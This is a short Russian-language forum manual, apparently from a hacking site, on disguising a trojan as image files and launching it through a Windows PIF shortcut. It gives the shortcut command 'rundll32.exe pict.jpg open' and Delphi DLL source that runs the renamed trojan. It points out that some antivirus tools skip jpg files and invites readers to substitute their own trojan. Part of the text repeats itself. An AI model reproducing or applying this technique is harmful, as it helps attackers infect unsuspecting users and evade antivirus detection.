Добрый день. Маленький мануал по загрузке трояна при помощи pif ярлыка(Да! именно ярлыка, без rename exe to pif). Проверялось только на nt, xp.
Юзер научился не запускать подозрительные exe файлы, а как насчет pif? Что мы видим в стаф к статье.. В архиве ниже лежат 3 файла:
1) date.jpg - это наш ехе файл (трой), просто переименованный в date.jpg
2) pict.jpg - это DLL которая будет загружать наш "date.jpg" запускать.
Исходник dll.dpr
Итог.
date.jpg
pict.jpg
mario.pif (иконку можно сменить)
(+ некоторые антивирусы просто не сканят jpg)
Даже сейчас это можно использовать, просто замените date.jpg на файл своего трояна. Юзер запустил mario.pif - троян "date.jpg" запущен. (v) Noctambulaar
Юзер научился не запускать подозрительные exe файлы, а как насчет pif? Что мы видим в стаф к статье.. В архиве ниже лежат 3 файла:
1) date.jpg - это наш ехе файл (трой), просто переименованный в date.jpg
2) pict.jpg - это DLL которая будет загружать наш "date.jpg" запускать.
Исходник dll.dpr
3) mario.pif - наш PIF ярлык, в свойствах которого вкладка "программа" видим в поле команда следующий текст "rundll32.exe pict.jpg open". что это значит? это значит, что ярлык прописан, как коммандная строка на выполнение загрузки нашей DLL с функцией запуска трояна при помощи загрузки DLL через rundll32.exe.library dll;
uses
Windows;
procedure open; stdcall;
begin
Winexec('date.jpg', SW_show); // можно грузить например 123.avi в итоге в процессах висит 123.avi
end;
exports open;
begin
end.
Итог.
date.jpg
pict.jpg
mario.pif (иконку можно сменить)
(+ некоторые антивирусы просто не сканят jpg)
Даже сейчас это можно использовать, просто замените date.jpg на файл своего трояна. Юзер запустил mario.pif - троян "date.jpg" запущен. (v) Noctambulaar